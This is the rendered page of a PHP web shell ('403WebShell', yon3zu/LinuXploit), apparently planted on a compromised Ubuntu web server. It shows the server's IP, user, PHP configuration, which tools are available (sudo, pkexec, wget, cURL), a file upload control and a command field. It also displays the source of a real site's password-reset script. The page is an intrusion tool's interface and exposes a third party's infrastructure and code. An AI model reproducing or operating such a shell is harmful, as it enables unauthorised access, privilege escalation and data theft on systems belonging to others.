Uname:Linux ip-10-0-5-176 6.8.0-1057-aws #60~22.04.1-Ubuntu SMP Wed May 27 08:16:59 UTC 2026 x86_64

403WebShell
403Webshell
Server IP : 3.111.61.48  /  Your IP : 216.73.216.67
Web Server : Apache
System : Linux ip-10-0-5-176 6.8.0-1057-aws #60~22.04.1-Ubuntu SMP Wed May 27 08:16:59 UTC 2026 x86_64
User : ubuntu ( 1000)
PHP Version : 8.2.31
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/vhost/itms.arukustech.com/public/api/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vhost/itms.arukustech.com/public/api/reset_password.php
<?php
// DEBUG ENABLED
error_reporting(E_ALL);
ini_set('display_errors', 1);
require_once __DIR__ . '/../../app/db.php';

if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    header("Location: /login.php");
    exit;
}

$token    = $_POST['token'] ?? '';
$password = $_POST['password'] ?? '';

if ($token === '' || $password === '') {
    header("Location: /reset.php?token=$token&msg=Invalid request");
    exit;
}

$pdo = db();

/* Validate token (15 min expiry) */
$st = $pdo->prepare("
    SELECT * FROM password_resets 
    WHERE token = ? 
    AND created_at >= NOW() - INTERVAL 15 MINUTE
");
$st->execute([$token]);
$row = $st->fetch(PDO::FETCH_ASSOC);

if (!$row) {
    die("Invalid or expired reset link.");
}

/* Hash password */
$hashed = password_hash($password, PASSWORD_DEFAULT);

/* Update password */
$pdo->prepare("
    UPDATE users SET password=? WHERE email=?
")->execute([$hashed, $row['email']]);

/* Delete token */
$pdo->prepare("
    DELETE FROM password_resets WHERE token=?
")->execute([$token]);

header("Location: /login.php?msg=Password reset successful");
exit;

Youez - 2016 - github.com/yon3zu
LinuXploit